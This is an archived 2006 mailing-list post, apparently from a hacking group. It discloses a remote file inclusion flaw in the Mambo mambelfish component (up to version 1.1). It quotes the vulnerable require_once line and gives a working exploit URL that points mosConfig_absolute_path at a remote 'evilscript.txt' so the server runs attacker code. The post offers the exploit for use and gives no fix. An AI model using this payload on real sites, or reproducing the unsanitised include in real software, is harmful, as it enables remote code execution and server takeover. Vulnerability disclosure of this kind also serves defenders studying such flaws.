Network Security: Detailed info on Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability

Subject:	Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability
Date:	17 Aug 2006 20:58:25 -0000

Subject:

Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability

Date:

17 Aug 2006 20:58:25 -0000


####################################################
#                                                  #
#         C Y BE R - W A R R i O R   T I M         #
#                                                  #
####################################################

mambo com_mambelfish Component (mosConfig_absolute_path) Remote File
Inclusion Vulnerabilities

####################################################

Author: mdx

####################################################

Class : Remote

####################################################

cont@ct: bilkopat[at]hotmail[dot]com

####################################################

Code: mambelfish.class.php?, line 28
***************************************************************************************************

  require_once( 
"$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php" );

***************************************************************************************************


Exploit:
http://www.site.com/[path]/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

####################################################
Greetz: Cyber-warrior TIM USERS
####################################################

<Prev in Thread]	Current Thread	[Next in Thread>
Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability, bilkopat <=

<Prev in Thread]

Current Thread

[Next in Thread>

Previous by Date:	Re: Mailslot bug (MS06-035) vs non-Mailslot bug (CVE-2006-3942), naveed
Next by Date:	Joomla Kochsuite Component <= 0.9.4 (config.kochsuite.php) Remote File Inclusion Vulnerability, camino
Previous by Thread:	contentpublisher Mambo Component Remote File Include Vulnerabilities, crackers_child
Next by Thread:	Joomla Kochsuite Component <= 0.9.4 (config.kochsuite.php) Remote File Inclusion Vulnerability, camino
Indexes:	[Date] [Thread] [Top] [All Lists]

Previous by Date:

Re: Mailslot bug (MS06-035) vs non-Mailslot bug (CVE-2006-3942), naveed

Next by Date:

Joomla Kochsuite Component <= 0.9.4 (config.kochsuite.php) Remote File Inclusion Vulnerability, camino

Previous by Thread:

contentpublisher Mambo Component Remote File Include Vulnerabilities, crackers_child

Next by Thread:

Joomla Kochsuite Component <= 0.9.4 (config.kochsuite.php) Remote File Inclusion Vulnerability, camino

Indexes:

[Date] [Thread] [Top] [All Lists]